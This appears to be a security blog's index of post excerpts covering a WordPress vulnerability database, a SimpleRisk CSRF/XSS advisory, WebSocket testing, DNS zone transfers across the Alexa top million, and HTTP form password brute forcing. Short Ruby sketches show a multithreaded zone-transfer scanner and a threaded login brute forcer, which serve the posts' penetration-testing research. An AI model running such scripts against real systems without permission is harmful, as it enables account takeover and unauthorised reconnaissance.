WPScan Vulnerability Database

I am pleased to announce that I launched the WPScan Vulnerability Database, a WordPress vulnerability database, last week during the BruCON security conference in Ghent, Belgium. Its development was funded by BruCON's 5by5 project, which I talked about in a previous post.

WPScan and WordPress Security Interview

I was asked to do an interview about WPScan and WordPress security in general, and I thought I'd share it here too.

BruCON 5by5 - WPScan Online Vulnerability Database

For those of you who have been living under a rock, BruCON is a security conference held every year in Belgium (originally in Brussels, now in Ghent). I have attended every BruCON conference since the second. Last year was the 5th time the conference had been held (correct me if I'm wrong), so the year before (2012) they set up what they called 5by5. This allowed BruCON, as it is a not-for-profit, to share its surplus cash by supporting community projects. Last year, they allocated up to 5,000 euros to 4 different community projects. These projects were:

1. OWASP OWTF (Abraham Aranguren)
2. The Cloudbug Project (Carlos Garcia Prado)
3. A tool a month (Robin Wood)
4. Eccentric Authentication (Guido Witmond)

As last year was such a success, they're doing it again this year! And this year I put in a proposal!

What passwords is GitHub banning?

GitHub was recently the target of a large weak-password brute force attack involving 40k unique IP addresses. One of the many security measures GitHub has since taken is to prevent users from registering with 'commonly-used weak passwords'. To find out what GitHub considers to be 'commonly-used weak passwords', I decided to compile a list of GitHub-valid passwords from a few password lists found online and one of my own. GitHub's password policy is reasonable (at least 7 characters, including 1 number and 1 letter), so of all the wordlists used, only 331 passwords were found to conform to it.
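As a rough illustration of how such a list can be compiled, here is a minimal Ruby sketch that filters wordlists down to passwords matching the policy described above (at least 7 characters, with at least one letter and one number). The file names are placeholders, not the lists I actually used.

# A rough sketch of filtering wordlists down to passwords that conform to a
# GitHub-style policy: at least 7 characters, at least one letter and one digit.
# The file names below are placeholders rather than the lists I actually used.
policy = lambda do |password|
  password.length >= 7 &&
    password.match?(/[A-Za-z]/) &&
    password.match?(/[0-9]/)
end

wordlists = ['rockyou-75.txt', 'john.txt', 'my-own-list.txt']

valid = wordlists
        .flat_map { |file| File.readlines(file).map(&:strip) }
        .uniq
        .select { |password| policy.call(password) }

File.write('github-valid-passwords.txt', valid.join("\n"))
puts "#{valid.size} passwords conform to the policy"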

SimpleRisk v.20130915-01 CSRF-XSS Account Compromise

1. *Advisory Information*
Title: SimpleRisk v.20130915-01 CSRF-XSS Account Compromise
Advisory ID: RS-2013-0001
Date Published: 2013-09-30

2. *Vulnerability Information*
Type: Cross-Site Request Forgery (CSRF) [CWE-352, OWASP-A8], Cross-Site Scripting (XSS) [CWE-79, OWASP-A3]
Impact: Full Account Compromise
Remotely Exploitable: Yes
Locally Exploitable: Yes
Severity: High
CVE-ID: CVE-2013-5748 (CSRF) and CVE-2013-5749 (non-httponly cookie)

3. *Software Description*
SimpleRisk is a simple and free tool to perform risk management activities. Based entirely on open source technologies and sporting a Mozilla Public License 2.0, a SimpleRisk instance can be stood up in minutes and instantly provides the security professional with the ability to submit risks, plan mitigations, facilitate management reviews, prioritize for project planning, and track regular reviews. It is highly configurable and includes dynamic reporting and the ability to tweak risk formulas on the fly. It is under active development with new features being added all the time. SimpleRisk is truly Enterprise Risk Management simplified. [0]

Homepage: http://www.simplerisk.org/
Download: https://simplerisk.googlecode.com/files/simplerisk-20130915-001.tgz

Security Testing HTML5 WebSockets

Recently I was faced with my first Web Application Security Assessment which relied heavily on HTML5's WebSockets. The first clue that the application was using WebSockets was that it kept giving me a timeout error while I was using my proxy of choice, Burp Suite. Looking at the HTTP requests/responses in Burp, I noticed that a large JavaScript file was requested and downloaded from the server. Within this file I noticed a URL with the ws:// scheme, the WebSocket scheme.

TCP/HTTP?

The initial WebSocket handshake is carried out over HTTP using an 'Upgrade' request. After this initial HTTP exchange, all further communication is carried out over the same underlying TCP connection using the WebSocket protocol rather than HTTP. On the application I was testing, the WebSocket handshake over HTTP looked like this in Wireshark:
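As a generic illustration of that handshake (not the actual capture from the application under test), here is a minimal Ruby sketch that sends an upgrade request over a raw TCP socket. The host and path are hypothetical placeholders.

# A minimal sketch of the WebSocket upgrade handshake over a raw TCP socket.
# The host and path below are hypothetical placeholders.
require 'socket'
require 'securerandom'
require 'base64'

host = 'example.com'
path = '/ws'
key  = Base64.strict_encode64(SecureRandom.random_bytes(16))

socket = TCPSocket.new(host, 80)
socket.write("GET #{path} HTTP/1.1\r\n" \
             "Host: #{host}\r\n" \
             "Upgrade: websocket\r\n" \
             "Connection: Upgrade\r\n" \
             "Sec-WebSocket-Key: #{key}\r\n" \
             "Sec-WebSocket-Version: 13\r\n\r\n")

# The server should reply with "HTTP/1.1 101 Switching Protocols"; after the
# blank line that ends the response headers, the same TCP connection carries
# WebSocket frames instead of HTTP.
while (line = socket.gets) && !line.strip.empty?
  puts line
end
socket.close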

Zone Transfers on The Alexa Top 1 Million Part 2

In part 1 of this blog post I conducted a DNS Zone Transfer (axfr) against the top 2000 sites of the Alexa Top 1 Million, in order to create a better subdomain brute forcing wordlist. At the time, conducting the Zone Transfers against the top 2000 sites took about 12 hours using a single-threaded bash script. I was pretty proud of this achievement at the time and thought that doing the same for the whole top 1 million sites was beyond the time and resources that I had. After creating a multithreaded and parallelised PoC in Ruby to do the Zone Transfers, the top 2000 took about 5 minutes instead of the 12 hours the single-threaded script had needed, so I decided it was possible to attempt a Zone Transfer against the whole top 1 million sites. There were 60,472 successful Zone Transfers (6%) out of the Alexa Top 1 Million, which equates to 566MB of raw data on disk. That amount of data brings its own challenges when attempting to manipulate it.
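As a rough sketch of the approach (not my actual PoC), something along these lines works: a pool of worker threads pulls domains off a queue, looks up each domain's name servers and shells out to dig for the AXFR attempt. The input file name, thread count and zones/ output directory are placeholders, and dig must be installed.

# A rough multithreaded sketch of the zone transfer PoC described above.
# The input file, thread count and zones/ output directory are placeholders.
require 'resolv'

domains = File.readlines('alexa-top-2000.txt').map(&:strip)
queue   = Queue.new
domains.each { |domain| queue << domain }

Dir.mkdir('zones') unless Dir.exist?('zones')

workers = Array.new(20) do
  Thread.new do
    loop do
      domain = begin
        queue.pop(true)
      rescue ThreadError
        break
      end

      # Look up the domain's name servers, then attempt an AXFR against each.
      nameservers = Resolv::DNS.open do |dns|
        dns.getresources(domain, Resolv::DNS::Resource::IN::NS).map { |ns| ns.name.to_s }
      end

      nameservers.each do |ns|
        output = `dig axfr #{domain} @#{ns} +time=5 +tries=1`
        # A refused or failed transfer produces an error message rather than records.
        next if output =~ /Transfer failed|communications error|connection timed out/i
        File.write("zones/#{domain}.txt", output)
        break
      end
    end
  end
end

workers.each(&:join)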

Zone Transfers on The Alexa Top 1 Million

At work, as part of every assessment, we do some reconnaissance which includes attempting a DNS Zone Transfer (axfr) and conducting a subdomain brute force on the target domain/s. The subdomain brute force is only as good as your wordlist; the Zone Transfer is a matter of luck. Alexa release a list of the top 1 million sites which is updated on a daily basis. To create a better wordlist for subdomain brute forcing, I attempted a DNS Zone Transfer against the first 2000 sites in the Alexa Top 1 Million list. With every successful Zone Transfer, the DNS A records were stored in a CSV file. This was all done using Carlos Perez's dnsrecon DNS enumeration tool. Dnsrecon was ever so slightly modified to only save A records; apart from that, I just used a bash script to iterate over the Top 1 Million list and ran dnsrecon's axfr option for each site with CSV output enabled.

Cracking Microsoft Excel 97-2004 .xls Documents

A client emailed to say they had forgotten the password for their Microsoft Excel .xls document and asked if it was possible to recover it. After searching on Google it was clear that there was plenty of shi...bloatware, which may have worked if you were willing to go through a few of them and pay a few dollars. It wasn't that important a document according to the client, but nevertheless a challenge is a challenge. The document had been encrypted using 'save as'; according to various sources online, the encryption algorithm is 40-bit RC4. As it is encrypted, nothing could be gleaned by opening the document with a hex editor. As always when Google turns up nothing useful, I turned to Twitter. A few people recommended Elcomsoft, who make Windows software to both recover and obtain the password of a Microsoft Excel document. This looked like a good bet, and they offer free trials! The recovery software, which seems to do a brute force attack, looked like it could have worked (especially now that I know how weak the password was), but I was running the software on a Virtual Machine. The recovery tool unfortunately didn't reveal the password; the paid-for version may have, I don't know.

Login Cross-Site Request Forgery (CSRF)

The new OWASP Top 10 2013 was released not so long ago, and while reading over it I noticed this:

"Attackers can trick victims into performing any state changing operation the victim is authorized to perform, e.g., updating account details, making purchases, logout and even login." - https://www.owasp.org/index.php/Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF)

This must be a mistake, I thought: why would you ever want to CSRF a user to log them into their own account? If you already had their login credentials it would surely be utterly pointless. Today I came across an academic paper which gives three examples of why Login CSRF can be an issue, and of how wrong I was.

Google:

"Search History. Many search engines, including Yahoo! and Google, allow their users to opt-in to saving their search history and provide an interface for a user to review his or her personal search history. Search queries contain sensitive details about the user’s interests and activities [41, 4] and could be used by an attacker to embarrass the user, to steal the user’s identity, or to spy on the user. An attacker can spy on a user’s search history by logging the user into the search engine as the attacker; see Figure 1. The user’s search queries are then stored in the attacker’s search history, and the attacker can retrieve the queries by logging into his or her own account."

HTTP Form Password Brute Forcing - The Need for Speed

HTTP form password brute forcing is not rocket science: you try multiple username/password combinations until you get a correct answer (or rather, a non-negative answer). Password brute forcing, especially over a network, takes time, and while your software is attempting to find a correct username/password combination it is taking up your and the remote system's resources. While the brute force is being carried out you might not want to run an automated scan, for example, as the remote server may not be able to cope with the number of connections or the rapid succession of connections. At the same time, your network bandwidth and system memory are also limited. It makes sense that when you conduct a weak password brute force it is done as fast as possible, so that your time and resources are freed up for other tasks. And of course, you're always going to be limited by time on a pentest/web app assessment, as the client's budget is never unlimited.

So what is the fastest way to brute force an HTTP form today? I use Burp Suite for my Web Application Security Assessments and would normally use Burp's Intruder, but is this the fastest tool to do it with? Of course, there are other limiting factors when brute forcing remotely, such as your Internet/network speed, CPU speed, RAM and the remote system's response times, among others. For this experiment we'll only be focusing on the software used to carry out the password brute force attack. This is far from being a perfect in-depth study, but it should hopefully give an idea of which tool out of my small collection (Burp Intruder Sniper vs Hydra http-post-form) is fastest.

The Setup

For both tools I set one user to brute force, admin, and used the rockyou-75.txt wordlist (19,963 lines), with one addition: the correct password, added as the last line of the file. The same username and password list was used for Burp's Intruder (Sniper) and for Hydra, and each tool was run one after the other, not at the same time.

Burp Suite Professional Intruder (Sniper) version: 1.5.11
Hydra (http-post-form) version: 7.4.2

A "Local" test was carried out against a localhost Apache 2 web server, as well as a "Remote" test against the www.ethicalhack3r.co.uk Nginx web server. The test form that I created to test against (both locally and remotely) does not make a database call, which is what would normally be expected of a real HTTP login form, so I'd expect my test login form to reply more quickly than one that had to make a database call. The 'Local' and 'Remote' columns represent the time it took each tool to find the correct password, which was at the end of the wordlist.
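As a rough illustration of what an HTTP form brute force boils down to (independently of Burp or Hydra), here is a minimal threaded Ruby sketch. The target URL, form field names and failure string are hypothetical placeholders rather than my actual test form.

# A minimal threaded sketch of an HTTP form brute force, for illustration only.
# The target URL, form field names and failure string are hypothetical.
require 'net/http'
require 'uri'

uri      = URI('http://127.0.0.1/login.php')
username = 'admin'

queue = Queue.new
File.readlines('rockyou-75.txt').each { |line| queue << line.strip }

found = nil
threads = Array.new(10) do
  Thread.new do
    while found.nil?
      password = begin
        queue.pop(true)
      rescue ThreadError
        break
      end
      response = Net::HTTP.post_form(uri, 'username' => username, 'password' => password)
      # Treat any response that lacks the failure message as a successful login.
      found = password unless response.body.include?('Login failed')
    end
  end
end
threads.each(&:join)

puts found ? "Password found: #{found}" : 'Password not found'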

SSH "accept : too many open files" on OS X when using Burp

EDIT 19.04.2013 10:17 --- WARNING! This did break the Tor Browser Bundle on my machine. The error was "Couldn't set maximum number of file descriptors: Invalid argument" ---

For as long as I can remember, when using SSH as a forward proxy to proxy Burp Suite through an upstream server, I have gotten an "accept : too many open files" error in my Mac OS X Terminal after a couple of hours of using Burp's Proxy and/or Scanner. When searching Google, the first solution I came across was to set the 'ulimit' to something higher; as far as I can tell, 'ulimit' sets per-user system limits, such as how many files a user is allowed to have open at once. On OS X, when attempting to set this limit to 'unlimited' I always got an error, "Neither the hard nor soft limit for "maxfiles" can be unlimited. Please use a numeric parameter for both.", and when setting the ulimit to something higher than the default (256) the "accept : too many open files" error would still not go away, or at least not for long. The only thing I found that would get rid of the error was to kill my ssh session and spawn a new one. After further reading, some forums and blogs suggested updating openssh; I did this and the issue persisted. I thought the issue may have been openssl, so I updated that too, and the issue persisted. I also tweeted about the issue, where the suggestion of adjusting the ulimit resurfaced, but I just couldn't get ulimit to fix the issue.

[Weekly Viewing] You and Your Research & Ruby 2.0

This week we have another two videos lined up for you. The first, by Haroon Meer, I was lucky enough to see in person at BruCON 2011. It is one of the best talks I have ever had the privilege to see, by anyone. If you're ever going to watch one of these 'Weekly Viewing' videos of mine, make it this one. The second video is by Matz, the creator of Ruby, in which he talks about Ruby's development and the new features of Ruby 2.0. In his talk Matz says that Ruby 1.8 will die soon. So update already! ;)

#HITB2012KUL D1T2 - Haroon Meer - You and Your Research

[Weekly Viewing] Web App Security and Zero Days

This is the first of hopefully many weekly posts in which I will share online security-related videos that I've watched during the week and think are worth sharing. This week I've got two great videos lined up for your viewing pleasure.

[OWASP AppSec USA 2012] Effective Approaches to Web Application Security - Zane Lackey

In this video Zane Lackey from Etsy talks about how to make a developer's job easier by making things safe by default, how to detect risky functionality and how to automate aspects of web application security monitoring and response.

Sony Freedom Of Information (FOI) Request

On the 14th of January the UK Information Commissioner's Office (ICO) sent Sony Computer Entertainment Europe Limited a monetary penalty notice of £250,000 following 'a serious breach of the Data Protection Act'. To quantify how much the ICO fined Sony per individual user's data, the exact number of UK PSN users would need to be known. A couple of sources put this number at 3 million, but I'm not sure where the original 3 million figure came from nor how accurate it really is [0][1]. If we were to take this 3 million figure at face value, the ICO fined Sony £250,000 / 3,000,000 ≈ £0.083, or about 8 pence, per user's data. According to the ICO, £250,000 is 'reasonable and proportionate' in this case. To get a more accurate figure I sent the ICO a FOI request asking for the redacted figure in the monetary penalty notice document, which simply states: "The Network Platform was used by an estimated REDACTED million customers in Europe, the Middle East, Africa, Australia and New Zealand with REDACTED million of those customers based in the UK.".